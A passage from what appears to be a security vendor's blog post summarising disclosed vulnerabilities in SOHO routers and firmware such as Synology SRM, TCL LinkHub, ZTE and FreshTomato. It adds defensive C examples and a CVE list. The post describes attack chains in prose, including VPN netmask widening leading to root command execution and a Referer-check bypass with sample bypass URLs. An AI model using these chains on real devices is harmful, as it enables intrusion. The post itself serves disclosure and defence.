  • TALOS-2022-1610: Talos discovered this vulnerability within the web server functionality of the QUARTZ-GOLD. By basing the firmware of this device on FreshTomato, many default features were inherited from FreshTomato that were not documented as part of the device functionality. More specifically, debug functionality was not disabled in FreshTomato and allowed a user authenticated to the web interface to issue direct Linux commands as if they had a shell. An authenticated attacker could use this vulnerability to achieve arbitrary command injection.

Observations

The Siretta QUARTZ-GOLD inherited many of the discovered vulnerabilities from the third-party code base included in the product. FreshTomato includes many features that are prebuilt but could have been disabled if the manufacturer were more familiar with the code they were building from. Much of the debugging functionality provided by FreshTomato is undocumented in the Siretta device and seems unintentionally included. When reusing large code bases, it is important to know what exactly is being included in that code base, and how it can be properly configured for the use-case the developer has in mind.

Synology SRM - RT2600ac

Research conducted by Claudio Bozzato.

Background

The Synology RT2600ac is a high-end SOHO router that runs on Synology SRM (Synology Router Manager), a Linux-based operating system for all Synology routers. Talos researchers chose to look at this product because of its popularity and reputation for quality. We submitted nine reports to Synology, of which two affect their VPN service (QuickConnect), and one affects a Qualcomm tool used in SRM, eventually leading to the disclosure of 10 CVEs. QuickConnect is Synology’s VPN service, which allows for managing routers remotely without requiring the configuration of the router to expose its management port and without having to manage DDNS services to locate the router remotely.

This research has been detailed in a dedicated blog post, which explains how Talos managed to chain some of the reported vulnerabilities to achieve remote code execution without prior authentication in SRM devices via Synology's VPN services, which are publicly accessible.

Notable Vulnerabilities

  • TALOS-2020-1064: When routers connect to the QuickConnect VPN, they are placed in a dedicated subnet. This report demonstrates that the subnets are, however, not logically split, so it is possible to change the assigned netmask to a larger one, allowing one to talk with any other router connected to the same VPN. The VPNs are accessible by routers upon registration against QuickConnect. But after initial registration, the router is not needed anymore, and the attack can be performed independently of the device. There are several VPNs available that are easily enumerable and seem to be geo-located.
  • TALOS-2020-1066: This report describes a vulnerability in the iptables rules within the router. SRM defines filtering rules that restrict access from the LAN to selected ports only. However, those rules are missing for connections that come from the QuickConnect VPN. This means that any service listening on the device is remotely accessible from the VPN. This can be used together with TALOS-2020-1064 to have unrestricted communication with any network service running on a chosen device among those reachable in the VPN.
  • TALOS-2020-1065: This report describes a vulnerability in Qualcomm's lbd, a service reachable via LAN on ports 7786 and 7787, which can be used without authentication to directly execute shell commands as root whenever an attacker is on the same LAN as the router. Since this is reachable via LAN, it is also reachable via the VPN. By chaining this vulnerability with the two above, it was possible to execute arbitrary commands as root via the VPN, without prior authentication, on any selected router connected to QuickConnect.

Observations

Synology SRM provides a convenient VPN service to solve the remote management issue for SOHO routers running on a dynamic IP address. However, this research has shown that such services can also widen the attack surface. Devices exposed via DDNS normally take more effort to be discovered, usually requiring an internet-wide scan. With QuickConnect, however, all devices are easily discovered as they're all connected to the same VPN, which is publicly accessible and whose geo-located services are easily enumerable.

TCL Linkhub Mesh Wifi

Research conducted by Carl Hurd.

Background

The TCL LinkHub is one of the newest products sold by TCL, and its feature set and price tag could mean a very rapid adoption rate, much like the budget TV market. Over the course of the research, Talos submitted 17 unique reports to TCL, resulting in 42 CVEs. The research on the TCL LinkHub Mesh Wi-Fi system was primarily focused on the API service that is used for all management of the device. The LinkHub does not use a web server to serve a user interface; instead, all interaction with the device is done through a phone application. This phone application interacts with the device through a Protocol Buffers (protobuf) based API. This service is one of the few ports open by default and thus was the most interesting target for this research.

Notable Vulnerabilities

  • TALOS-2022-1463: This vulnerability existed in the code for getting and setting values in the flash storage of the LinkHub. This vulnerability is interesting because it was not contained in a specific library and was used in almost every binary on the device. When reading values from flash, the function did not take into account the length of the destination buffer. An attacker could easily change a configuration value to a large value, and the next time that variable was loaded from flash, it would cause a buffer overflow. This vulnerability would lead to arbitrary code execution.
  • TALOS-2022-1455: This vulnerability existed in the API service that is exposed for use with the phone application. Protocol Buffers serialization is used for all communication with the device from the management application. Once the buffer is deserialized, it is dispatched to various handlers across the device. Within the set_mf_rule functionality, a memcpy occurs whose length is determined directly by user input. Attackers could use this functionality to send an mf_rule message that contains fields larger than the statically sized buffers in the device. This vulnerability would lead to a buffer overflow and arbitrary code execution.
  • TALOS-2022-1458: This vulnerability existed in the API service that is exposed for use with the phone application. Protocol Buffers serialization is used for all communication with the device from the management application. Once the buffer is deserialized, it is dispatched to various handlers across the device. Within the ucloud_add_node functionality, which is used to add satellites to the router mesh, a MxpManageList message is passed directly to the system function. An attacker could use a malicious message to execute arbitrary commands using this vulnerability.

Observations

The TCL LinkHub has a unique approach to management, which changes the attack surface significantly. Choosing to use Protocol Buffers for serialization is a good decision on the developer's part, as it is a well-tested and maintained library, but once the data is deserialized, much of the input is blindly trusted since it is assumed to come from the management application. All of this data should be treated as user data, and more validation should occur after deserialization and prior to use in potentially dangerous functions, such as memcpy.

TP-Link TL-R600VPN

Research conducted by Jared Rittle and Carl Hurd.

Background

The TP-Link TL-R600VPN became a subject of our research for its direct involvement in the VPNFilter campaign. The TP-Link TL-R600VPN is a five-port SOHO router. This device contains a Realtek RTL8198 integrated system on a chip. This particular chip uses an offshoot of the MIPS-1 architecture developed by Lexra. This device is a fairly run-of-the-mill small router and contains network diagnostic capabilities and basic router functionality that is managed by a web server on the device. This research led to four Talos reports to TP-Link, resulting in four CVEs. For a more in-depth look at the research done on this device, refer to the corresponding blog post.

Notable Vulnerabilities

  • TALOS-2018-0620: This vulnerability existed in the header parsing of HTTP requests within the web server. This vulnerability was triggered by sending a request to a specific subset of pages on the web server. Once such a request was made, a statically sized buffer was used for the parsed headers. An attacker could use an abnormally long header entry to overflow the buffer and overwrite the return address. This vulnerability leads to arbitrary code execution.
  • TALOS-2018-0619: This vulnerability existed in the network debugging functionality of the device. The ping functionality of the R600-VPN contained a user-supplied parameter whose length was not checked. An attacker could supply an abnormally long ping_addr parameter to overflow the statically sized buffer used to hold the value, in turn overwriting the return address. This vulnerability leads to arbitrary code execution.
  • TALOS-2018-0618: This vulnerability was contained within the HTTP server of the R600-VPN. The user-provided URL was parsed without regard for special sequences such as "../" that navigate up a directory tree. Normally, sequences like this are removed or ignored in a URL and the directory navigation does not occur, but in the R600-VPN this navigation could be used to retrieve any file on the device. This vulnerability leads to sensitive information disclosure.

Observations

Most of the findings on the TL-R600VPN centered around the web server and the functionality provided by it. One of the simplest solutions to reduce risk is to integrate a well-tested web server instead of developing one from scratch or including untested code in the product. While some of the vulnerable code was within the web server itself, much of it was also added by the manufacturer for simple additional features, like network diagnostics. It is clear from this research that any added code needs to be reviewed to prevent these issues.

ZTE MF971R

Research conducted by Marcin Noga.

Background

The ZTE MF971R mobile router is one of the newest devices in the ZTE MF mobile router family. At least in Poland, it is a very popular device, sold among others by major GSM providers and even bundled as a gift with some of their products or services. Over the course of the research, Talos submitted seven reports to ZTE, resulting in seven CVEs. The research on the ZTE MF971R router was primarily focused on the web application and server that are used for all management of the device. We managed to find a set of vulnerabilities in the Web APIs which, chained together, allowed us to create a one-click exploit giving full remote access to the device. See our deep-dive whitepaper for a more in-depth explanation.

Notable Vulnerabilities

  • TALOS-2021-1317: This vulnerability is related to the implementation of CSRF protection and API access restriction in the Web APIs. To communicate with a certain set of Web APIs, a request should be sent from the 127.0.0.1 address or the default router IP address, 192.168.0.1. This is verified by checking the HTTP Referer value. Unfortunately, the way the check was implemented gives an attacker the possibility to bypass it by simply including the string 127.0.0.1 anywhere in the Referer URL, thereby obtaining full access to the API.
  • TALOS-2021-1320: Talos discovered this vulnerability within the implementation of the ADB_MODE_SWITCH Web API. A password parameter that is part of this API is not properly sanitized with respect to its length, which leads to a stack-based buffer overflow. The victim does not need to be logged in to be affected by this vulnerability. The only constraint an attacker needs to pass is the Referer check, which is easy to bypass and is described in TALOS-2021-1317. This remote pre-auth stack-based buffer overflow gives an attacker full control when overwriting the return address and, as we demonstrated, can be turned into one-click remote code execution.
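The Referer check in TALOS-2021-1317 fails because it looks for the expected address as a substring rather than parsing the URL. The following added example, which is not ZTE's code, puts that substring check beside an allowlist check on the parsed host, using the two addresses named above; the function names are assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hosts allowed to drive the management API (the two addresses named above). */
static const char *const allowed_hosts[] = { "127.0.0.1", "192.168.0.1" };

/*
 * Flawed check: a substring match. Any Referer that merely contains one of
 * the strings passes, so "http://other.example/127.0.0.1" is accepted.
 */
bool referer_ok_substring(const char *referer)
{
    if (referer == NULL) return false;
    for (size_t i = 0; i < sizeof allowed_hosts / sizeof allowed_hosts[0]; i++)
        if (strstr(referer, allowed_hosts[i]) != NULL) return true;
    return false;
}

/*
 * Copy the host of an absolute http(s) URL into host[]. The authority runs to
 * the first '/', '?' or '#'; a '@' inside it (userinfo) is rejected outright,
 * because "http://127.0.0.1@other.example/" is exactly the shape a loose
 * parser gets wrong. The host ends at ':' (port) or the end of the authority.
 */
static bool url_host(const char *url, char *host, size_t host_size)
{
    const char *p;
    if (strncmp(url, "http://", 7) == 0) p = url + 7;
    else if (strncmp(url, "https://", 8) == 0) p = url + 8;
    else return false;                        /* not an absolute http(s) URL */
    size_t auth = strcspn(p, "/?#");
    if (auth == 0 || memchr(p, '@', auth) != NULL) return false;
    size_t n = strcspn(p, ":/?#");            /* n <= auth */
    if (n == 0 || n >= host_size) return false;
    memcpy(host, p, n);
    host[n] = '\0';
    return true;
}

/* Hardened check: parse, then compare the whole host against the allowlist. */
bool referer_ok_allowlist(const char *referer)
{
    char host[64];
    if (referer == NULL || !url_host(referer, host, sizeof host)) return false;
    for (size_t i = 0; i < sizeof allowed_hosts / sizeof allowed_hosts[0]; i++)
        if (strcmp(host, allowed_hosts[i]) == 0) return true;
    return false;
}
```

Even when parsed correctly, a Referer check is only a secondary control, since the header may be absent or stripped; a per-session CSRF token remains the primary defence.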

Observations

The ZTE MF971R’s security suffered for several reasons. Despite visible efforts to reduce access to certain WebAPIs, it was still possible to bypass this mechanism, thus increasing the number of attack vectors. The main web server binary lacked compatibility with basic mitigations such as ASLR (Address Space Layout Randomization) and stack cookies, making the exploitation of existing vulnerabilities trivial. Improving security mechanisms in the aforementioned areas will reduce the number of attack vectors and make exploiting existing vulnerabilities, especially those without any authorization, more difficult or practically impossible.

Common frameworks

The previous section talked about the specific routers that we investigated. However, some of these routers also ran specific software that is common for many routers: open-source firmware such as OpenWrt, FreshTomato, AsusWRT or DD-WRT. One router also ran a specific kernel module called KCodes. As this software isn’t specific to the vendors we discussed in the router sections, we’re grouping the vulnerabilities we found together.

OpenWrt

Research conducted by Claudio Bozzato.

Background

OpenWrt is a Linux-based OS, primarily used on embedded devices to route network traffic. It’s highly customizable and ships with a set of tools and libraries that have been optimized to run on hardware with limited resources. Due to this, OpenWrt is a common choice among SOHO routers.

Notable Vulnerabilities

  • TALOS-2019-0893: This vulnerability affected the ustream-ssl library, a library that works as an SSL wrapper for OpenSSL, mbed TLS and wolfSSL. This issue describes how the library does not terminate the SSL connection immediately when a wrong certificate is supplied by an HTTPS server, allowing the client to send one request using any unverified certificate, before terminating the connection. As OpenWrt uses this library for tools like wget, any functionality relying on it would be affected by this information leak when requesting any HTTPS URL, which could allow, in the worst case, for an attacker to perform a man-in-the-middle attack and steal any sensitive information present in the request.

Observations

Because the HTTPS connection eventually terminates with an error, this issue can easily go unnoticed. As OpenWrt is a platform that is easy to customize and write scripts for, such a vulnerability may affect a large number of users.

FreshTomato

Research conducted by Francesco Benvenuto.

Background

FreshTomato is a popular open-source firmware project. It is an actively maintained and modern firmware project that is widely used by multiple SOHO routers. By default, it ships with several functionalities, e.g., SSH, VPN capabilities, Telnet, routing, etc.

Notable Vulnerabilities

  • TALOS-2022-1642: This vulnerability existed in one of the functionalities provided by FreshTomato's HTTP server. The server provides a simple template language, and one of the templating functions reads the content of a user-specified file from a specific folder. Because no sanitization is performed and the file path is composed by concatenating the hard-coded path with the provided filename, this function is vulnerable to path traversal. An attacker with valid credentials could read any file in the file system.
  • TALOS-2022-1641: This vulnerability existed in one of the log-related functions provided by FreshTomato's HTTP server. The functionality allows users to find certain strings in the log file via OS commands. Because no real sanitization is performed against the user-controlled parameter, this function is vulnerable to an OS command injection vulnerability. An attacker could leverage this vulnerability to achieve arbitrary command injection.
  • TALOS-2022-1509: This vulnerability existed in the URL unescape functionality provided by FreshTomato's HTTP server. The unescape always assumes that there are two characters following the '%' character. However, this is not always the case, which opens the door to an out-of-bounds read and write.
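Both the FreshTomato template read (TALOS-2022-1642) and the Siretta DELETE_FILE handler (TALOS-2022-1638) build a path by appending a user-supplied name to a fixed base folder, one ending in a path traversal and the other in a shell command. The following added example, which is not code from either project, shows one way such a handler can be written: validate the name as a single path component, then read or delete it relative to the base directory with openat()/unlinkat() rather than passing a concatenated string to system(). Function names and the scratch directory are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Accept only a single plain path component: no separators, no "." or "..",
 * and a conservative character allowlist. This one check closes both the
 * traversal case (template read) and the shell-metacharacter case (DELETE_FILE).
 */
bool valid_entry_name(const char *name)
{
    if (name == NULL) return false;
    size_t len = strnlen(name, 256);              /* NAME_MAX on Linux is 255 */
    if (len == 0 || len > 255) return false;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return false;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        bool ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                  (c >= '0' && c <= '9') || c == '.' || c == '_' || c == '-';
        if (!ok) return false;
    }
    return true;
}

/*
 * Remove <base>/<name> without a shell: open the base directory once and
 * unlink the entry relative to it, so only the filesystem ever interprets the
 * name. Returns 0, or -1 with errno set (EINVAL for a rejected name).
 */
int delete_entry_in_base(const char *base, const char *name)
{
    if (!valid_entry_name(name)) { errno = EINVAL; return -1; }
    int dirfd = open(base, O_RDONLY | O_DIRECTORY);
    if (dirfd < 0) return -1;
    int rc = unlinkat(dirfd, name, 0);            /* files only: no AT_REMOVEDIR */
    int saved = errno;
    close(dirfd);
    errno = saved;
    return rc;
}

/*
 * Read <base>/<name> into buf the same way. O_NOFOLLOW stops a symlink planted
 * in the folder from redirecting the read. Returns bytes read, or -1.
 */
ssize_t read_entry_in_base(const char *base, const char *name, char *buf, size_t size)
{
    if (!valid_entry_name(name)) { errno = EINVAL; return -1; }
    int dirfd = open(base, O_RDONLY | O_DIRECTORY);
    if (dirfd < 0) return -1;
    int fd = openat(dirfd, name, O_RDONLY | O_NOFOLLOW);
    int saved = errno;
    close(dirfd);
    errno = saved;
    if (fd < 0) return -1;
    ssize_t n = read(fd, buf, size);
    close(fd);
    return n;
}

/*
 * Self-check in a constructed scratch directory under /tmp: create a file,
 * then exercise read, traversal rejection, deletion and a repeat deletion.
 * Returns 0 when every step behaves as expected, else the failing step number.
 */
int round_trip_check(void)
{
    char dir[] = "/tmp/entry-check-XXXXXX";
    char path[300], buf[32];
    if (mkdtemp(dir) == NULL) return 1;
    snprintf(path, sizeof path, "%s/node-42.data", dir);
    FILE *f = fopen(path, "w");
    if (f == NULL) { rmdir(dir); return 2; }
    fputs("hello", f);
    fclose(f);
    int step = 0;
    if (read_entry_in_base(dir, "node-42.data", buf, sizeof buf) != 5) step = 3;
    else if (read_entry_in_base(dir, "../node-42.data", buf, sizeof buf) != -1 ||
             errno != EINVAL) step = 4;
    else if (delete_entry_in_base(dir, "node-42.data") != 0) step = 5;
    else if (access(path, F_OK) == 0) step = 6;
    else if (delete_entry_in_base(dir, "node-42.data") != -1 || errno != ENOENT) step = 7;
    unlink(path);                                 /* no-op once deleted */
    rmdir(dir);
    return step;
}

int main(void)
{
    printf("valid 'node-42.data': %d, valid '../node-42.data': %d\n",
           valid_entry_name("node-42.data"), valid_entry_name("../node-42.data"));
    printf("round trip: %s\n", round_trip_check() == 0 ? "ok" : "failed");
    return 0;
}
```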

Observations

Because the FreshTomato project is the base for many routers, any vulnerability found in the software could have wide-ranging consequences. We cannot fully gauge how the firmware is deployed and how much impact these vulnerabilities will have on the deployed router.

Asuswrt and Asuswrt-Merlin New Gen, DD-WRT

Research conducted by Francesco Benvenuto.

Background

Like FreshTomato, Asuswrt, Asuswrt-Merlin New Gen and DD-WRT are the base firmware for several SOHO routers.

Notable Vulnerabilities

  • TALOS-2022-1511: This vulnerability existed in the URL unescape functionality provided by the Asuswrt and Asuswrt-Merlin New Gen HTTP server. The unescape always assumes that there are two characters following the "%" character. However, this is not always the case and could lead to an out-of-bounds read and write.
  • TALOS-2022-1510: This vulnerability existed in the URL unescape functionality provided by DD-WRT's HTTP server. The unescape always assumes that there are two characters following the "%" character; however, this assumption is incorrect and could lead to an out-of-bounds read and write.

Observations

After our researchers discovered TALOS-2022-1509, we found other software that was vulnerable to the same flawed unescape pattern, including TALOS-2022-1511 in Asuswrt and Asuswrt-Merlin New Gen, and TALOS-2022-1510 in DD-WRT.
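The unescape flaw shared by TALOS-2022-1509, TALOS-2022-1511 and TALOS-2022-1510 is the assumption that two bytes always follow a '%'. The following added example, which is not code from FreshTomato, Asuswrt or DD-WRT, contrasts that pattern with a bounded decoder that takes an explicit input length and rejects a truncated or non-hex escape instead of reading past the buffer; the function names are assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Value of a hex digit, or -1 if c is not one. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/*
 * The flawed pattern, reduced to its core (shown as a comment only):
 *
 *     if (in[i] == '%') {
 *         out[o++] = (hex(in[i + 1]) << 4) | hex(in[i + 2]);   // no length check
 *         i += 3;
 *     }
 *
 * On an input ending in "%4", in[i + 2] is the terminating NUL, i then jumps
 * past the terminator, and the loop keeps copying whatever memory follows the
 * string into out: an out-of-bounds read that turns into an out-of-bounds write.
 */

/*
 * Bounded decoder. Takes an explicit input length (an HTTP body is not
 * guaranteed to be NUL-terminated), never reads beyond in[in_len - 1] and
 * never writes beyond out[out_size - 1]. Returns the decoded length, or -1
 * when a '%' is not followed by two hex digits within in_len or when out is
 * too small. Rejecting a malformed escape outright is safer than decoding
 * "as much as possible", because a partially decoded value would otherwise
 * flow into the checks that run after it.
 */
int safe_unescape(const char *in, size_t in_len, char *out, size_t out_size)
{
    size_t i = 0, o = 0;
    if (in == NULL || out == NULL || out_size == 0) return -1;
    while (i < in_len) {
        if (o + 1 >= out_size) return -1;     /* room for this byte plus NUL */
        if (in[i] == '%') {
            if (in_len - i < 3) return -1;    /* truncated escape: "%" or "%4" */
            int hi = hexval((unsigned char)in[i + 1]);
            int lo = hexval((unsigned char)in[i + 2]);
            if (hi < 0 || lo < 0) return -1;  /* non-hex escape such as "%zz" */
            out[o++] = (char)((hi << 4) | lo);
            i += 3;
        } else {
            out[o++] = in[i++];
        }
    }
    out[o] = '\0';
    return (int)o;
}
```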

KCodes NetUSB.ko

Research conducted by Dave McDaniel.

Background

Some NETGEAR routers utilize a bespoke kernel module called NetUSB.ko from a Taiwanese company called KCodes. This module is custom-made for each device but contains similar functionality. The module shares USB devices over TCP, allowing clients to use various vendor-made drivers and software to connect to these devices in such a way that the client machine treats the remote device as a local USB device plugged into their computer. The software used for NETGEAR routers is called NETGEAR USB Control Center, and it utilizes a driver called NetUSBUDSTcpBus.sys (on Windows) for communications.

Notable Vulnerabilities

  • TALOS-2019-0775: Once the static AES key was recovered, an attacker could easily trigger a DoS or remote information disclosure using a single opcode after the handshake.
  • TALOS-2019-0776: Similar to TALOS-2019-0775, this vulnerability leaks memory. In this case, it leaks very useful memory such as stack boundary addresses, a pointer to a specific configuration function and, notably, the base address of the running NetUSB.ko kernel module. This could potentially be combined with other remote attacks that could leverage this data when designing a specific payload for the target.

Observations

Many other products use NetUSB.ko. A previously disclosed vulnerability in 2015 led researchers to believe a flaw in this very kernel module potentially existed in as many as 92 products across multiple vendors. For this analysis, we utilized the R8000 hardware to test the R8000 version of NetUSB.ko (1.0.2.66) and the R7900 version (1.0.2.69) since both modules are compiled for the same kernel. Specifically, the information disclosed in TALOS-2019-0776 appears to be particularly useful for recovering sensitive memory addresses for payload generation, regardless of the architecture/operating system that uses the kernel module.

Key observations

SOHO routers are generally valuable targets for adversaries due to their position within the network and wide adoption within common network deployments. Their relatively low cost, wide availability, ease of acquisition and user-friendly management features lead to these products being in many homes, small and home offices, warehouses, coffee shops and many other businesses. They are even deployed as gateways providing remote access to industrial environments.

Vulnerabilities in these routers can provide entry to a huge variety of targets, and the same vulnerability can be used for impact, meaning these routers are high-value targets for malicious actors.

The security posture of these lower-cost routers has improved over the last few years, but in general, security advice for these devices is the same as it has been in the past. Some of the important security tenets for manufacturers are:

  • Features and services should be disabled by default unless they are critical for the operation of the device.
  • WAN-side management should be deactivated by default.
  • Support modern security features such as TLS/SSL encryption and make sure they're implemented properly.
  • Never trust user input.
  • Keep third-party code up-to-date.
  • Audit or familiarize yourself with integrated code.
  • Don’t rely on obscure and undocumented diagnostic features or credentials.

Each of the vulnerabilities discovered falls into one of these categories. Code quality is always going to be an additional concern, and the use of safe functions should always be enforced during development. Ideally, use static analysis tooling during development. This may not be financially viable for many products hoping to keep consumer costs low; in that case, lean on compiler warnings and any other methods of ensuring the highest code quality possible.

Simple changes to the development process can mitigate many of the worst effects of these issues. Memory corruption, one of the most glaring vulnerability classes, can be mitigated by using memory-safe languages (e.g., Rust or Go). If safe languages are not an option, vendors should make sure to implement as many mitigations as possible, both compiler-based and OS-based. Examples of these mitigations are non-executable stacks and address space layout randomization (ASLR).

The next most helpful change involves defining user interaction boundaries. Generic strings are notoriously difficult to parse or apply access controls to. By utilizing a well-defined API boundary, it is easier to validate user requests and input. The boundary also acts as an access control list to prevent a malicious user from executing arbitrary commands or providing input that would result in other unexpected behavior.
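As an added illustration of the API-boundary point (example code, not from the post or from any router vendor's firmware), the C dispatcher below reduces every management request to an action name plus one argument, looks the action up in a fixed table, and runs that entry's validator before the handler ever sees the argument. The table is the boundary and doubles as the access control list: an action that is not listed, or an argument that fails its validator, is refused with a distinct status code, so no generic string reaches anything that could interpret it. The action names, validators, handlers and status codes are assumptions chosen for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example (not from the post or any vendor firmware): a fixed
 * action table as the user-interaction boundary for a management API. */

typedef int (*validator_fn)(const char *arg);
typedef int (*handler_fn)(const char *arg);

enum {
    REQ_OK             =  0,
    REQ_UNKNOWN_ACTION = -1,   /* action not in the table: ACL rejection */
    REQ_BAD_ARG        = -2,   /* argument failed the action's validator */
    REQ_HANDLER_FAILED = -3
};

/* Interface names: 1 to 15 characters from [a-z0-9] only, so shell
 * metacharacters, path separators and whitespace never reach a handler. */
static int valid_ifname(const char *arg)
{
    if (arg == NULL) return 0;
    size_t n = strlen(arg);
    if (n == 0 || n > 15) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)arg[i];
        if (!(islower(c) || isdigit(c))) return 0;
    }
    return 1;
}

/* Actions that take no argument must receive none. */
static int no_arg(const char *arg)
{
    return arg == NULL || arg[0] == '\0';
}

/* Hypothetical handlers standing in for the real work. */
static int do_reboot(const char *arg)       { (void)arg; return 0; }
static int do_iface_status(const char *arg) { (void)arg; return 0; }

struct api_entry {
    const char  *action;
    validator_fn validate;
    handler_fn   handle;
};

/* The boundary: anything not listed here does not exist to callers. */
static const struct api_entry API[] = {
    { "reboot",       no_arg,       do_reboot       },
    { "iface_status", valid_ifname, do_iface_status },
};

int handle_request(const char *action, const char *arg)
{
    if (action == NULL) return REQ_UNKNOWN_ACTION;
    for (size_t i = 0; i < sizeof API / sizeof API[0]; i++) {
        if (strcmp(action, API[i].action) != 0) continue;
        if (!API[i].validate(arg)) return REQ_BAD_ARG;
        return API[i].handle(arg) == 0 ? REQ_OK : REQ_HANDLER_FAILED;
    }
    return REQ_UNKNOWN_ACTION;
}

int main(void)
{
    /* Constructed requests: two legitimate, two that the boundary rejects. */
    struct { const char *action, *arg; } reqs[] = {
        { "reboot",       ""      },
        { "iface_status", "eth0"  },
        { "iface_status", "eth0;" },
        { "ifconfig",     "eth0"  },
    };
    for (size_t k = 0; k < sizeof reqs / sizeof reqs[0]; k++)
        printf("%-13s %-6s -> %d\n", reqs[k].action, reqs[k].arg,
               handle_request(reqs[k].action, reqs[k].arg));
    return 0;
}
```

Because every action carries its own validator, adding a feature means adding a table row with an explicit argument grammar, and the set of things a remote user can ask the device to do is exactly the set of rows. The distinct return codes also give the logging layer something to count: a burst of REQ_UNKNOWN_ACTION or REQ_BAD_ARG from one client is a useful detection signal on a management interface.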

The most important security step a user of these devices can take is to assess each service present on the device. Verify that each running service is required for the day-to-day operation of the device, and disable all extraneous services. Services that cannot be disabled should be restricted to the absolute minimum of access or completely blocked using alternative methods, such as firewall rules that block the traffic. During the acquisition process, if possible, do basic research to ensure the devices have sane, secure defaults enabled, such as the use of encrypted protocols for remote access and administration, if applicable. Start your assessment by reading the router's user manual thoroughly, even before purchase. The quality of the details concerning device features in a user manual is often indicative of the overall product quality.

While the security posture of SOHO routers has generally improved, many could benefit from low-cost mitigations that would drastically improve their security posture. Over the past few years, Talos has published 141 advisories covering 289 CVEs within 13 SOHO and industrial routers and six common frameworks. Talos vulnerability research is always driven by the mandate to protect Cisco customers, but we also aim to improve the security of all devices we research. All research has been publicly disclosed, after disclosure to the vendor, according to Cisco’s vulnerability disclosure policy. These disclosures directly result in vulnerability remediations that improve the security posture of anyone using these devices.

Vulnerability List

This blog post included a summary of each router and a few select vulnerabilities. Below is a list of all the advisories Talos disclosed post-VPNFilter.

Talos ID (Linked to Report) | CVE(s) | Product
--- | --- | ---
TALOS-2022-1511 | CVE-2022-26376 | Asuswrt and Asuswrt-Merlin New Gen
TALOS-2022-1592 | CVE-2022-38393 | Asus RT-AX82U
TALOS-2022-1590 | CVE-2022-38105 | Asus RT-AX82U
TALOS-2022-1586 | CVE-2022-35401 | Asus RT-AX82U
TALOS-2021-1361 | CVE-2021-21913 | D-Link DIR3040
TALOS-2021-1285 | CVE-2021-21820 | D-Link DIR3040
TALOS-2021-1284 | CVE-2021-21819 | D-Link DIR3040
TALOS-2021-1283 | CVE-2021-21818 | D-Link DIR3040
TALOS-2021-1282 | CVE-2021-21817 | D-Link DIR3040
TALOS-2021-1281 | CVE-2021-21816 | D-Link DIR3040
TALOS-2022-1510 | CVE-2022-27631 | DD-WRT
TALOS-2022-1642 | CVE-2022-38451 | FreshTomato
TALOS-2022-1641 | CVE-2022-42484 | FreshTomato
TALOS-2022-1509 | CVE-2022-28664 - CVE-2022-28665 | FreshTomato
TALOS-2022-1523 | CVE-2022-25932 | InHand Networks InRouter302
TALOS-2022-1522 | CVE-2022-29888 | InHand Networks InRouter302
TALOS-2022-1521 | CVE-2022-28689 | InHand Networks InRouter302
TALOS-2022-1520 | CVE-2022-26023 | InHand Networks InRouter302
TALOS-2022-1519 | CVE-2022-30543 | InHand Networks InRouter302
TALOS-2022-1518 | CVE-2022-29481 | InHand Networks InRouter302
TALOS-2022-1501 | CVE-2022-26518 | InHand Networks InRouter302
TALOS-2022-1500 | CVE-2022-26075 | InHand Networks InRouter302
TALOS-2022-1499 | CVE-2022-26420 | InHand Networks InRouter302
TALOS-2022-1496 | CVE-2022-27172 | InHand Networks InRouter302
TALOS-2022-1495 | CVE-2022-26510 | InHand Networks InRouter302
TALOS-2022-1481 | CVE-2022-26780 - CVE-2022-26782 | InHand Networks InRouter302
TALOS-2022-1478 | CVE-2022-26042 | InHand Networks InRouter302
TALOS-2022-1477 | CVE-2022-25995 | InHand Networks InRouter302
TALOS-2022-1476 | CVE-2022-26002 | InHand Networks InRouter302
TALOS-2022-1475 | CVE-2022-26007 | InHand Networks InRouter302
TALOS-2022-1474 | CVE-2022-26020 | InHand Networks InRouter302
TALOS-2022-1473 | CVE-2022-26085 | InHand Networks InRouter302
TALOS-2022-1472 | CVE-2022-21182 | InHand Networks InRouter302
TALOS-2022-1471 | CVE-2022-24910 | InHand Networks InRouter302
TALOS-2022-1470 | CVE-2022-25172 | InHand Networks InRouter302
TALOS-2022-1469 | CVE-2022-21238 | InHand Networks InRouter302
TALOS-2022-1468 | CVE-2022-21809 | InHand Networks InRouter302
TALOS-2019-0776 | CVE-2019-5017 | KCodes NetUSB.ko
TALOS-2019-0775 | CVE-2019-5016 | KCodes NetUSB.ko
TALOS-2018-0625 | CVE-2018-3953 - CVE-2018-3955 | Linksys E Series
TALOS-2023-1723 | CVE-2023-25582 - CVE-2023-25583 | Milesight UR32L
TALOS-2023-1718 | CVE-2023-24019 | Milesight UR32L
TALOS-2023-1716 | CVE-2023-25081 - CVE-2023-25124 | Milesight UR32L
TALOS-2023-1715 | CVE-2023-24018 | Milesight UR32L
TALOS-2023-1714 | CVE-2023-22653 | Milesight UR32L
TALOS-2023-1713 | CVE-2023-24595 | Milesight UR32L
TALOS-2023-1712 | CVE-2023-22299 | Milesight UR32L
TALOS-2023-1711 | CVE-2023-22365 | Milesight UR32L
TALOS-2023-1710 | CVE-2023-24582 - CVE-2023-24583 | Milesight UR32L
TALOS-2023-1706 | CVE-2023-24519 - CVE-2023-24520 | Milesight UR32L
TALOS-2023-1705 | CVE-2023-23546 | Milesight UR32L
TALOS-2023-1699 | CVE-2023-22659 | Milesight UR32L
TALOS-2023-1698 | CVE-2023-22306 | Milesight UR32L
TALOS-2023-1697 | CVE-2023-23902 | Milesight UR32L
TALOS-2023-1696 | CVE-2023-23571 | Milesight UR32L
TALOS-2023-1695 | CVE-2023-23547 | Milesight UR32L
TALOS-2023-1694 | CVE-2023-23550 | Milesight UR32L
TALOS-2023-1704 | CVE-2023-24496 - CVE-2023-24497 | MilesightVPN
TALOS-2023-1703 | CVE-2023-22371 | MilesightVPN
